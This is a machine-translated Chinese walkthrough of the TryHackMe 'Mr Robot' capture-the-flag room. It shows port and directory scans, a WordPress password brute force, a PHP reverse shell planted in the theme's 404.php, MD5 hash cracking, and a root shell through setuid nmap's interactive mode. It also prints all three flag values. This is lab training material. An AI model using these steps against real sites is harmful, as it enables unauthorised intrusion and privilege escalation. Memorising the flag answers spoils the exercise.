服务发现

┌──(rootkali)-[~/tryhackme/mrrobot]└─# nmap -sV -Pn 10.10.180.172 -p-  Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 02:33 EDTNmap scan report for 10.10.180.172Host is up (0.31s latency).Not shown: 65532 filtered portsPORT    STATE  SERVICE  VERSION22/tcp  closed ssh80/tcp  open   http     Apache httpd443/tcp open   ssl/http Apache httpdService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 398.37 seconds

查看http://10.10.180.172/robots.txt,显示两个文件

User-agent: *fsocity.dickey-1-of-3.txt

关上http://10.10.180.172/key-1-of...,找到key 1

073403c8a58a1f80d943455fb30724b9

fsocity.dic下载下来,像是一个字典文件,可能是登陆密码字典,那么当初须要的是一个可登陆的用户名?

目录爆破

┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u "http://10.10.180.172"  -e* -t 100   _|. _ _  _  _  _ _|_    v0.3.8                                                                                                                                                                                                             (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100Error Log: /root/dirsearch/logs/errors-21-09-15_03-27-35.logTarget: http://10.10.180.172                                                                                                                                                                                                                                                                                                                                                                                                                                                              [03:27:36] Starting: [03:29:13] 403 -  218B  - /.user.ini                           [03:29:46] 301 -    0B  - /0  ->  http://10.10.180.172/0/                          [03:31:19] 301 -  233B  - /admin  ->  http://10.10.180.172/admin/        [03:31:39] 200 -    1KB - /admin/                                    [03:31:39] 403 -  224B  - /admin/.htaccess[03:31:39] 200 -    1KB - /admin/?/login[03:31:43] 301 -    0B  - /adm/index.php  ->  http://10.10.180.172/adm/[03:32:00] 200 -    1KB - /admin/index            [03:32:00] 200 -    1KB - /admin/index.html[03:32:26] 301 -    0B  - /admin/index.php  ->  http://10.10.180.172/admin/                                   [03:32:45] 301 -    0B  - /admin2/index.php  ->  http://10.10.180.172/admin2/[03:33:01] 301 -    0B  - /admin_area/index.php  ->  http://10.10.180.172/admin_area/[03:33:50] 301 -    0B  - /adminarea/index.php  ->  http://10.10.180.172/adminarea/[03:34:37] 301 -    0B  - /administrator/index.php  ->  http://10.10.180.172/administrator/[03:35:33] 301 -    0B  - /apc/index.php  ->  http://10.10.180.172/apc/                                             [03:35:40] 301 -  233B  - /audio  ->  http://10.10.180.172/audio/[03:36:05] 301 -    0B  - /atom  ->  http://10.10.180.172/feed/atom/    [03:36:35] 301 -  232B  - /blog  ->  http://10.10.180.172/blog/[03:36:38] 301 -    0B  - /bb-admin/index.php  ->  http://10.10.180.172/bb-admin/[03:36:52] 301 -    0B  - /bitrix/admin/index.php  ->  http://10.10.180.172/bitrix/admin/[03:37:46] 301 -    0B  - /Citrix/AccessPlatform/auth/clientscripts/cookies.js  ->  http://10.10.180.172/Citrix/AccessPlatform/auth/clientscripts/cookies.js[03:38:36] 301 -  231B  - /css  ->  http://10.10.180.172/css/                    [03:40:26] 301 -    0B  - /engine/classes/swfupload/swfupload.swf  ->  http://10.10.180.172/engine/classes/swfupload/swfupload.swf[03:40:27] 301 -    0B  - /engine/classes/swfupload/swfupload_f9.swf  ->  http://10.10.180.172/engine/classes/swfupload/swfupload_f9.swf[03:40:42] 301 -    0B  - /etc/lib/pChart2/examples/imageMap/index.php  ->  http://10.10.180.172/etc/lib/pChart2/examples/imageMap/[03:40:52] 301 -    0B  - /extjs/resources/charts.swf  ->  http://10.10.180.172/extjs/resources/charts.swf[03:40:55] 200 -    0B  - /favicon.ico             [03:41:04] 301 -    0B  - /feed  ->  http://10.10.180.172/feed/                                         [03:42:04] 301 -  234B  - /images  ->  http://10.10.180.172/images/      [03:42:10] 301 -    0B  - /html/js/misc/swfupload/swfupload.swf  ->  http://10.10.180.172/html/js/misc/swfupload/swfupload.swf[03:42:25] 200 -    1KB - /index.html                             [03:42:29] 301 -    0B  - /image  ->  http://10.10.180.172/image/    [03:42:51] 301 -    0B  - /index.php  ->  http://10.10.180.172/                                                  [03:42:51] 200 -  504KB - /intro[03:42:52] 301 -    0B  - /index.php/login/  ->  http://10.10.180.172/login/[03:43:05] 301 -  230B  - /js  ->  http://10.10.180.172/js/[03:43:31] 200 -  309B  - /license.txt                                                                  [03:44:22] 302 -    0B  - /login  ->  http://10.10.180.172/wp-login.php                   [03:44:30] 302 -    0B  - /login/  ->  http://10.10.180.172/wp-login.php[03:45:10] 301 -    0B  - /modelsearch/index.php  ->  http://10.10.180.172/modelsearch/[03:45:11] 301 -    0B  - /myadmin/index.php  ->  http://10.10.180.172/myadmin/[03:45:19] 301 -    0B  - /panel-administracion/index.php  ->  http://10.10.180.172/panel-administracion/[03:45:23] 403 -   94B  - /phpmyadmin                                                   [03:45:53] 403 -   94B  - /phpmyadmin/           [03:45:54] 403 -   94B  - /phpmyadmin/scripts/setup.php      [03:46:40] 301 -    0B  - /pma/index.php  ->  http://10.10.180.172/pma/                          [03:46:53] 200 -   64B  - /readme                  [03:46:53] 200 -   64B  - /readme.html[03:47:13] 200 -   41B  - /robots.txt                     [03:47:42] 301 -    0B  - /rss  ->  http://10.10.180.172/feed/[03:48:29] 200 -    0B  - /sitemap                                                                                [03:48:29] 200 -    0B  - /sitemap.xml[03:48:30] 200 -    0B  - /sitemap.xml.gz[03:48:53] 301 -    0B  - /siteadmin/index.php  ->  http://10.10.180.172/siteadmin/[03:49:16] 301 -    0B  - /sql/index.php  ->  http://10.10.180.172/sql/                      [03:50:32] 301 -    0B  - /templates/ja-helio-farsi/index.php  ->  http://10.10.180.172/templates/ja-helio-farsi/[03:50:33] 301 -    0B  - /templates/rhuk_milkyway/index.php  ->  http://10.10.180.172/templates/rhuk_milkyway/[03:50:33] 301 -    0B  - /templates/beez/index.php  ->  http://10.10.180.172/templates/beez/[03:50:59] 301 -    0B  - /tmp/index.php  ->  http://10.10.180.172/tmp/       [03:52:05] 301 -  236B  - /wp-admin  ->  http://10.10.180.172/wp-admin/[03:52:09] 301 -  238B  - /wp-content  ->  http://10.10.180.172/wp-content/[03:52:10] 403 -  245B  - /wp-content/plugins/akismet/admin.php[03:52:10] 403 -  247B  - /wp-content/plugins/akismet/akismet.php[03:52:11] 403 -  228B  - /wp-content/uploads/[03:52:11] 301 -  239B  - /wp-includes  ->  http://10.10.180.172/wp-includes/[03:52:11] 403 -  221B  - /wp-includes/[03:52:16] 301 -    0B  - /webadmin/index.php  ->  http://10.10.180.172/webadmin/[03:52:30] 302 -    0B  - /wp-admin/  ->  http://10.10.180.172/wp-login.php?redirect_to=http%3A%2F%2F10.10.180.172%2Fwp-admin%2F&reauth=1[03:52:31] 500 -    3KB - /wp-admin/setup-config.php[03:52:35] 200 -    0B  - /wp-content/         [03:52:37] 200 -    0B  - /wp-content/plugins/google-sitemap-generator/sitemap-core.php[03:52:37] 500 -    0B  - /wp-includes/rss-functions.php[03:52:37] 200 -    3KB - /wp-login                                      [03:52:38] 200 -    3KB - /wp-login.php                                       [03:52:38] 200 -    3KB - /wp-login/[03:52:38] 301 -    0B  - /wp-register.php  ->  http://10.10.180.172/wp-login.php?action=register[03:52:51] 405 -   42B  - /xmlrpc.php  

wpscan开掘wordpress信息,没什么有用的信息,枚举authid也无奈爆破wordpress用户名

┌──(rootkali)-[~/tryhackme/mrrobot]└─# wpscan --url http://10.10.180.172        _______________________________________________________________         __          _______   _____         \ \        / /  __ \ / ____|          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \            \  /\  /  | |     ____) | (__| (_| | | | |             \/  \/   |_|    |_____/ \___|\__,_|_| |_|         WordPress Security Scanner by the WPScan Team                         Version 3.8.14       Sponsored by Automattic - https://automattic.com/       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart_______________________________________________________________[+] URL: http://10.10.180.172/ [10.10.180.172][+] Started: Wed Sep 15 02:55:03 2021Interesting Finding(s):[+] Headers | Interesting Entries: |  - Server: Apache |  - X-Mod-Pagespeed: 1.9.32.3-4523 | Found By: Headers (Passive Detection) | Confidence: 100%[+] robots.txt found: http://10.10.180.172/robots.txt | Found By: Robots Txt (Aggressive Detection) | Confidence: 100%[+] XML-RPC seems to be enabled: http://10.10.180.172/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: |  - http://codex.wordpress.org/XML-RPC_Pingback_API |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] The external WP-Cron seems to be enabled: http://10.10.180.172/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: |  - https://www.iplocation.net/defend-wordpress-from-ddos |  - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15). | Found By: Emoji Settings (Passive Detection) |  - http://10.10.180.172/d6f242c.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1' | Confirmed By: Meta Generator (Passive Detection) |  - http://10.10.180.172/d6f242c.html, Match: 'WordPress 4.3.1'[+] WordPress theme in use: twentyfifteen | Location: http://10.10.180.172/wp-content/themes/twentyfifteen/ | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://10.10.180.172/wp-content/themes/twentyfifteen/readme.txt | [!] The version is out of date, the latest version is 3.0 | Style URL: http://10.10.180.172/wp-content/themes/twentyfifteen/style.css?ver=4.3.1 | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In 404 Page (Passive Detection) | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) |  - http://10.10.180.172/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'[+] Enumerating All Plugins (via Passive Methods)[i] No plugins Found.[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:12:45 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:12:45[i] No Config Backups Found.[!] No WPScan API Token given, as a result vulnerability data has not been output.[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register[+] Finished: Wed Sep 15 03:17:20 2021[+] Requests Done: 173[+] Cached Requests: 6[+] Data Sent: 42.372 KB[+] Data Received: 267.073 KB[+] Memory used: 209.672 MB[+] Elapsed time: 00:22:17

首页命令行反对6个命令,钻研了半天,没看到有什么有用的信息

prepare    --->显示动画:whoismyrobot.comfsociety   --->显示动画:are you ready to join fsocietyinform     --->显示四张图片,表白了一些观点,没看进去有什么线索question   --->显示四张图片,别离批评了patriot,executive,capitalist,businessmanwakeup       --->显示一个动画,没有文字join       --->留下一个邮箱

在http://10.10.180.172/license.txt,关上f12,找到base64加密过的暗藏线索

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something?ZWxsaW90OkVSMjgtMDY1Mgo=

解密后:

elliot:ER28-0652

登陆进去当前,在users里收集到两个用户名和邮箱

elliot     Elliot Alderson      elliot@mrrobot.commich05654  krista Gordon      kgordon@therapist.com

用下载的字典爆破mich05654账号

wpscan --url http://10.10.180.172/ --usernames mich05654 --passwords /root/tryhackme/mrrobot/fsocity.dic[!] Valid Combinations Found: | Username: mich05654, Password: Dylan_2791

然而登陆进去如同没什么有用的信息?

回到elliot登录界面

在后盾页面 Appearace->Theme Editer能够编辑在应用皮肤外面的php代码,咱们抉择404.php这个文件,上传一个反弹shell
应用这个payload :
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
把代码复制到404.php,批改反弹主机信息
开启监听
在前台页面轻易输出一个不存在的页面,触发反弹shell -->http://10.10.180.172/asdasdda...

在/home/robot目录找到key-2-of-3.txt文件,然而webshell没有读权限

在同目录找到一个哈希文件

$ ls -alhls -alhtotal 16Kdrwxr-xr-x 2 root  root  4.0K Nov 13  2015 .drwxr-xr-x 3 root  root  4.0K Nov 13  2015 ..-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5$ cat password.raw-md5cat password.raw-md5robot:c3fcd3d76192e4007dfb496cca67e13b

把哈希文件保留到靶机的hash.txt,用jonn爆破

┌──(rootkali)-[~/tryhackme/mrrobot]└─# john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])Warning: no OpenMP support for this hash type, consider --fork=4Press 'q' or Ctrl-C to abort, almost any other key for statusabcdefghijklmnopqrstuvwxyz (robot)1g 0:00:00:00 DONE (2021-09-15 22:49) 50.00g/s 2025Kp/s 2025Kc/s 2025KC/s bonjour1..123092Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliablySession completed

明码:abcdefghijklmnopqrstuvwxyz,切换到tty当前su robot,查看key-2-of-3.txt

$ su robotsu robotPassword: abcdefghijklmnopqrstuvwxyzrobot@linux:~$ cat key-2-of-3.txtcat key-2-of-3.txt822c73956184f694993bede3eb39f959robot@linux:~$ 

依据提醒,查看nmap权限,发现是一个suid

robot@linux:~$ whereis nmapwhereis nmapnmap: /usr/local/bin/nmaprobot@linux:~$ ls -al /usr/local/bin/nmapls -al /usr/local/bin/nmap-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap

依据GTFPbins里nmap的提权办法,这里采纳shell-b办法晋升到root权限,拿到key-3-of-3.txt

robot@linux:~$ nmap --interactivenmap --interactiveStarting nmap V. 3.81 ( http://www.insecure.org/nmap/ )Welcome to Interactive Mode -- press h <enter> for helpnmap> !sh!sh# ididuid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)# ls -alh /root ls -alh /roottotal 32Kdrwx------  3 root root 4.0K Nov 13  2015 .drwxr-xr-x 22 root root 4.0K Sep 16  2015 ..-rw-------  1 root root 4.0K Nov 14  2015 .bash_history-rw-r--r--  1 root root 3.2K Sep 16  2015 .bashrcdrwx------  2 root root 4.0K Nov 13  2015 .cache-rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done-r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt-rw-r--r--  1 root root  140 Feb 20  2014 .profile-rw-------  1 root root 1.0K Sep 16  2015 .rnd# cat /root/key-3-of-3.txtcat /root/key-3-of-3.txt04787ddef27c3dee1ee161b21670b4e4#